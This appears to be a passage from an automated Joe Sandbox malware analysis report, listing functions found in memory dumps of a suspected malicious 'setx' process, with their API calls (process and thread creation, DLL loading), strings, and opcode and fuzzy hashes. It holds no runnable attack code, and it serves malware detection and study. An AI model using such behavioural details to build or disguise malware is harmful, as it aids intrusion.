                        Function 00420B50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 436 420b50-420bbe call 43a020 call 43aa30 call 424510 call 411410 call 431370 447 420be0-420be5 436->447 448 420bc0-420bd1 PostThreadMessageW 436->448 448->447 449 420bd3-420bdd 448->449 449->447
                        APIs
                        • PostThreadMessageW.USER32(y11J94u5t,00000111,00000000,00000000), ref: 00420BCD
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID: y11J94u5t$y11J94u5t
                        • API String ID: 1836367815-1857237950
                        • Opcode ID: d4014a7f82bfd4c4b5c392abbe8c2f3a4fc6c55da09482422e0725ea95ef265c
                        • Instruction ID: 9ed2b4add9a45a1eba015fdc0b287ce53bbb55a5e7db586371dd28e40e0e2088
                        • Opcode Fuzzy Hash: d4014a7f82bfd4c4b5c392abbe8c2f3a4fc6c55da09482422e0725ea95ef265c
                        • Instruction Fuzzy Hash: FB01C831E4025876DB21AB919C02FDF7B7C9F41B54F444155BA047B181D6786A0687A9
                        Function 00432C50 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNELBASE(000007D0), ref: 00432D1B
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID: net.dll$wininet.dll
                        • API String ID: 3472027048-1269752229
                        • Opcode ID: 2c13c63140d7957b4d8ddc56fb1a01df24c052451a126f09caa042e6a1dbdffe
                        • Instruction ID: 99cc13df33f5078a76f838168dc8d5567c3813b33b60740d2a7e3c71c454b4b6
                        • Opcode Fuzzy Hash: 2c13c63140d7957b4d8ddc56fb1a01df24c052451a126f09caa042e6a1dbdffe
                        • Instruction Fuzzy Hash: 8C315EB1600704ABD714DF65CC85FEBBBB8EB88744F00452EBA5D6B245D7B4BA40CBA4
                        Function 004383C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                        Download Yara Rule
                        APIs
                        • RtlAllocateHeap.NTDLL(00421766,?,004347DB,00421766,00434777,004347DB,?,00421766,00434777,00001000,?,?,00439C70), ref: 004383FC
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID: wGC
                        • API String ID: 1279760036-4262620719
                        • Opcode ID: e5a46834363e99c52d6815dcfa8bb54489d8a8d2589ec9944ef7440d54d75e6c
                        • Instruction ID: e45af0968d65abe8aec60e57a5831f06a0dbda634c5366731d07a4fb5c1783ca
                        • Opcode Fuzzy Hash: e5a46834363e99c52d6815dcfa8bb54489d8a8d2589ec9944ef7440d54d75e6c
                        • Instruction Fuzzy Hash: 2CE06D752042047BD614EF59DC46EDB33ACEFC8714F00440AFA0DA7241C670B9118AB8
                        Function 00427C47 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNELBASE(00008003,?,?,00421A50,00436E97,00434777,?), ref: 00427C83
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorMode
                        • String ID: wGC
                        • API String ID: 2340568224-4262620719
                        • Opcode ID: ef2920d3e055be692ddf31b3d0548f79ffaaf97fef2632f230840df87f9cd97b
                        • Instruction ID: b9bd16ac24cb8c9696ab1bd1d64e3051f412cc88261073f3907e8fb74bd2c810
                        • Opcode Fuzzy Hash: ef2920d3e055be692ddf31b3d0548f79ffaaf97fef2632f230840df87f9cd97b
                        • Instruction Fuzzy Hash: E6E0C2777803003BF750D7B1AC07FB522499B85704F054169B90CD63C2E929F9114229
                        Function 00427C50 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNELBASE(00008003,?,?,00421A50,00436E97,00434777,?), ref: 00427C83
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorMode
                        • String ID: wGC
                        • API String ID: 2340568224-4262620719
                        • Opcode ID: f8400cc9d30aae11928ba3888ba0d918eb23a6dac0955d6349a825a5319c61b9
                        • Instruction ID: 9ff1cc80dbdcbb72fd49f45139a80ad86c79ddca6b9d4c871c710e9572224bfc
                        • Opcode Fuzzy Hash: f8400cc9d30aae11928ba3888ba0d918eb23a6dac0955d6349a825a5319c61b9
                        • Instruction Fuzzy Hash: 9FD05E723843143BF750A7B69C07FA6328D5B85754F054169BA0CDB2D2E969F5104169
                        Function 0042ECC5 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 105COMMON
                        Download Yara Rule
                        APIs
                        • CoInitialize.OLE32(00000000), ref: 0042ECE7
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: Initialize
                        • String ID: @J7<
                        • API String ID: 2538663250-2016760708
                        • Opcode ID: 64a2b2c3d2c4c534bb0262d5df59a5ba862a538046fb26de5ef13569335b554e
                        • Instruction ID: 2bdaa5236865eb5c85aade15a8ba2932f41780ea417bb69742524821eb70cd3d
                        • Opcode Fuzzy Hash: 64a2b2c3d2c4c534bb0262d5df59a5ba862a538046fb26de5ef13569335b554e
                        • Instruction Fuzzy Hash: FC314DB6A1060A9FDB00DF99D8809EEB7B9FF88304B508559E505EB314D775AE05CBA0
                        Function 0042ECD0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                        Download Yara Rule
                        APIs
                        • CoInitialize.OLE32(00000000), ref: 0042ECE7
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: Initialize
                        • String ID: @J7<
                        • API String ID: 2538663250-2016760708
                        • Opcode ID: 47e57b663ea4e8bb39407ab17e335c96b2a1127cc8e2f58856ff3b19e4127920
                        • Instruction ID: b26b351d470da5d2c5076ff6c46059474131bb3646951bdb6cdd4e157645f807
                        • Opcode Fuzzy Hash: 47e57b663ea4e8bb39407ab17e335c96b2a1127cc8e2f58856ff3b19e4127920
                        • Instruction Fuzzy Hash: 7D314DB6A0020AAFDB00DFD9D8809EFB3B9BF88304F508559E505EB314D775EE058BA0
                        Function 00424510 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00424582
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: Load
                        • String ID:
                        • API String ID: 2234796835-0
                        • Opcode ID: 7990f290981bd4aee8d21bcb8d2ae64449c1592f8a81b01ec6cffc28f3e0e825
                        • Instruction ID: e1340d28d1bbc7754868cfafadb9fb21c83a3e60dd436a568c94302debb9d9ad
                        • Opcode Fuzzy Hash: 7990f290981bd4aee8d21bcb8d2ae64449c1592f8a81b01ec6cffc28f3e0e825
                        • Instruction Fuzzy Hash: E50152B6E0020DB7DF10EBE5EC42F9EB3789B54308F404195EA0897241F634EB54C795
                        Function 004384A0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessInternalW.KERNELBASE(00421001,00421029,00420E01,00000000,00427E03,00000010,00421029,?,?,00000044,00421029,00000010,00427E03,00000000,00420E01,00421029), ref: 00438500
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateInternalProcess
                        • String ID:
                        • API String ID: 2186235152-0
                        • Opcode ID: 3fd48a30e9d0ae253e7c946412751fffa894b6aa8f0fbddb53dac173fcdc2c6c
                        • Instruction ID: 74224eb5312f9741f4de3d05988ae55f5c81e913999d3c83aca26cbb06a54bb7
                        • Opcode Fuzzy Hash: 3fd48a30e9d0ae253e7c946412751fffa894b6aa8f0fbddb53dac173fcdc2c6c
                        • Instruction Fuzzy Hash: AD01AEB2200208BBCB44DE89DC81EDB77ADAF8C754F018209FA0DA3240D634E8518BA8
                        Function 004196C0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00419705
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread
                        • String ID:
                        • API String ID: 2422867632-0
                        • Opcode ID: 5577063b7115bd8f84cde0c5b87baa86d32718c9197f9556726589215144810d
                        • Instruction ID: 207246b0426be83f5a6e23374b4c75b6ff68a2d3cf00f657142290af2ffcc986
                        • Opcode Fuzzy Hash: 5577063b7115bd8f84cde0c5b87baa86d32718c9197f9556726589215144810d
                        • Instruction Fuzzy Hash: E3F0657338031436E23066AAAC03FDB734CCF85BA5F14042AFB0CDB1C1D996B85142E8
                        Function 004196BA Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00419705
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread
                        • String ID:
                        • API String ID: 2422867632-0
                        • Opcode ID: 612f07cfd547da86b30dd011403053c1142aa68976199a2cf9b2a585cb37d91c
                        • Instruction ID: 753fd56b8bf6388affa64fbbedb9ad97a05a035e301b5c4db61fa55093f30dc8
                        • Opcode Fuzzy Hash: 612f07cfd547da86b30dd011403053c1142aa68976199a2cf9b2a585cb37d91c
                        • Instruction Fuzzy Hash: E3F0ED323C130077F23066A99C07FDB224C8F80B54F24045AFB08EB2C1CAAAB85082A8
                        Function 00438410 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                        Download Yara Rule
                        APIs
                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,05C0C1F8,00000007,00000000,00000004,00000000,00423DFB,000000F4,?,?,?,?,?), ref: 0043844C
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID:
                        • API String ID: 3298025750-0
                        • Opcode ID: 5b5779b60b6029d5b904e4ea3c71d230503f93d838177fd9535817038665164d
                        • Instruction ID: c15ed651c29da25cd1e8f3ba5cfad3859d2a93141d96d060f49787cabbf174b0
                        • Opcode Fuzzy Hash: 5b5779b60b6029d5b904e4ea3c71d230503f93d838177fd9535817038665164d
                        • Instruction Fuzzy Hash: 91E039B1204204BBD614EE69DC41E9B33ACEB88710F004009BA1CA7241D670B9118AB8
                        Function 00427E40 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                        Download Yara Rule
                        APIs
                        • GetFileAttributesW.KERNELBASE(?), ref: 00427E6C
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: 24d4ac1920455be403cab738455affea6146d3d0e88abb47b82f3acc6191bfef
                        • Instruction ID: 6a5997341efa5db3059560b9c6a9f0c1a8c2c74fd3617fcde2d578dfd48d86de
                        • Opcode Fuzzy Hash: 24d4ac1920455be403cab738455affea6146d3d0e88abb47b82f3acc6191bfef
                        • Instruction Fuzzy Hash: CFE0DF7124420427FB206BA8AC46B6633488B48764F6906E1B91C8F2D1E53CFD014164
                        Function 02C52C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 13541670bdba0b99c91a98430422c92adffdcd6aae1160e03830f8267c49e71d
                        • Instruction ID: f6a357694fd4514e2d21edbb10ecebd22eed281d4ec35c22d93b9706c0bf8524
                        • Opcode Fuzzy Hash: 13541670bdba0b99c91a98430422c92adffdcd6aae1160e03830f8267c49e71d
                        • Instruction Fuzzy Hash: 00B09BB19419D5C5EA11E7604A0C717794067D0701F15C161D6030641F4739D1D5E176

                        Non-executed Functions

                        Function 0041E19F Relevance: .0, Instructions: 16COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 575650a2d501c17a948c8e9434c5317809272c0de04d5eabed58d15fd72b0dca
                        • Instruction ID: 6a827f4664e86df58c642004d06cf34c1bdeeb3d026642848e51fd7fa49d56e5
                        • Opcode Fuzzy Hash: 575650a2d501c17a948c8e9434c5317809272c0de04d5eabed58d15fd72b0dca
                        • Instruction Fuzzy Hash: 8AB0922AA9400801D1256C2F79803B0F368C7C7235E102AAFE90CF7A000093C89E0999
                        Function 02C52890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: ___swprintf_l
                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                        • API String ID: 48624451-2108815105
                        • Opcode ID: 98fd5d9f4b9ec10d31f594e10dc64d97aa9c948e05812deddc272b3a52a1caa5
                        • Instruction ID: a4fa3fb3b882b272f6d78016d97bdeafb6cb5d2831021fa2aba565796f3b4a0e
                        • Opcode Fuzzy Hash: 98fd5d9f4b9ec10d31f594e10dc64d97aa9c948e05812deddc272b3a52a1caa5
                        • Instruction Fuzzy Hash: 6951E6B2A04166BFDB20DB9989C097EF7F8BB48204754816AEC65D7641D334DF80CBE5
                        Function 02CC2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: ___swprintf_l
                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                        • API String ID: 48624451-2108815105
                        • Opcode ID: 7e17c25a42cb3b7d75bf54fede4b6bcb17eab2b525d3f4aecbede2dc1662daa9
                        • Instruction ID: 1785f0fe4d583a5c71e944ea9721d62f1715b5ae15635a2440a7337ca6eda706
                        • Opcode Fuzzy Hash: 7e17c25a42cb3b7d75bf54fede4b6bcb17eab2b525d3f4aecbede2dc1662daa9
                        • Instruction Fuzzy Hash: FC51D575A00645AFDB30DF5CC89097FB7F9EF84200B6484AEE896D7681E774EA40CB61
                        Function 02C47630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                        Download Yara Rule
                        Strings
                        • ExecuteOptions, xrefs: 02C846A0
                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02C84655
                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02C84725
                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 02C84787
                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02C846FC
                        • Execute=1, xrefs: 02C84713
                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02C84742
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID:
                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                        • API String ID: 0-484625025
                        • Opcode ID: a858aed2d13583f68beb54d047fba9bfc469324924ebdf62cbaba44847ee60c3
                        • Instruction ID: 5d8ab3c2c488cae9ce83bbf5345e9f45c52eff3071731f4d63070fd099e52393
                        • Opcode Fuzzy Hash: a858aed2d13583f68beb54d047fba9bfc469324924ebdf62cbaba44847ee60c3
                        • Instruction Fuzzy Hash: BE511931600219BAEF25ABA5DC89FEBB7BAEF44304F0404D9E505A7190DF719E49DF50
                        Function 02CE6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                        • Instruction ID: a48bb1658626cc4c36d7f699ff648088afe30925a0e57d1ce3072251d2e803b4
                        • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                        • Instruction Fuzzy Hash: 3B023771518341AFCB08DF18C494A6FBBEAEFD8704F54892DF98A4B264DB31E945CB42
                        Function 02C5B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: __aulldvrm
                        • String ID: +$-$0$0
                        • API String ID: 1302938615-699404926
                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                        • Instruction ID: cf9d129e8c895d003d9b444fe36f175a5422c0c69bb597b7b8afa908e09d891e
                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                        • Instruction Fuzzy Hash: 3081D670E452698EDF188E68C4517FDBFB2AF85358F144159DC51A7299CB34CEC0CB68
                        Function 02CC20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: ___swprintf_l
                        • String ID: %%%u$[$]:%u
                        • API String ID: 48624451-2819853543
                        • Opcode ID: 7ff82e37c9e36794c6a5d241e5ca02482e70615738ba1f52f11019af16aba698
                        • Instruction ID: 1f92a5f7980123d12942e31a63b62acb4d110ef7efdd8e4777e0509b81632464
                        • Opcode Fuzzy Hash: 7ff82e37c9e36794c6a5d241e5ca02482e70615738ba1f52f11019af16aba698
                        • Instruction Fuzzy Hash: ED215176A00119ABDB11EF69CC44ABEB7F9EF84744F14012AED05E3240E730DA419BA1
                        Function 02C3F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                        Download Yara Rule
                        Strings
                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02C802E7
                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02C802BD
                        • RTL: Re-Waiting, xrefs: 02C8031E
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID:
                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                        • API String ID: 0-2474120054
                        • Opcode ID: bb5d9bff1cc4ba9c05b9d91ccd14c63b8201d008728f43304ea0f9c2816050a9
                        • Instruction ID: a10b24933218eca69146f003a32c72ae3be4fb26cba63f9a06002e01dc866f2b
                        • Opcode Fuzzy Hash: bb5d9bff1cc4ba9c05b9d91ccd14c63b8201d008728f43304ea0f9c2816050a9
                        • Instruction Fuzzy Hash: 25E1CF30A087419FD726DF28C884B2AB7E1BF85328F144E5DF5A58B6E1D774DA48CB42
                        Function 02C4BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                        Download Yara Rule
                        Strings
                        • RTL: Resource at %p, xrefs: 02C87B8E
                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02C87B7F
                        • RTL: Re-Waiting, xrefs: 02C87BAC
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID:
                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                        • API String ID: 0-871070163
                        • Opcode ID: 8904c87aa91638a9b1d9cfcc11a674e8bd424ff70adf4de8ae4746700d7a20f6
                        • Instruction ID: 20265a966804f0cd07e7e59eec2a1193674f23e102e3961c9a7b83a1f848f2ae
                        • Opcode Fuzzy Hash: 8904c87aa91638a9b1d9cfcc11a674e8bd424ff70adf4de8ae4746700d7a20f6
                        • Instruction Fuzzy Hash: A341BF397047029BEB20DE25C940B6BB7E6EF88718F100A1DF95A9B680DB31E9458F91
                        Function 02C4B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                        Download Yara Rule
                        APIs
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02C8728C
                        Strings
                        • RTL: Resource at %p, xrefs: 02C872A3
                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02C87294
                        • RTL: Re-Waiting, xrefs: 02C872C1
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                        • API String ID: 885266447-605551621
                        • Opcode ID: 8576494d056fd8c9f24bdf1cb4b06f475548f03a0721887db87a9a70595e4f80
                        • Instruction ID: 4f8685cd070befeb4b2811660d9a56128119d054025a9584cbe0b04c4d71c66b
                        • Opcode Fuzzy Hash: 8576494d056fd8c9f24bdf1cb4b06f475548f03a0721887db87a9a70595e4f80
